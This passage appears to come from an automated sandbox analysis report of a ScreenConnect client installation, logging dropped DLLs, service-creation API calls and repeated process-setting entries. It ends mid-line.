                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF979DE push eax; retf 7_2_00007FFAEEF979ED
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF97935 pushad ; retf 7_2_00007FFAEEF979DD
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,5_2_00E31880
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3239D RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00E3239D
                      Source: C:\Windows\System32\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Screen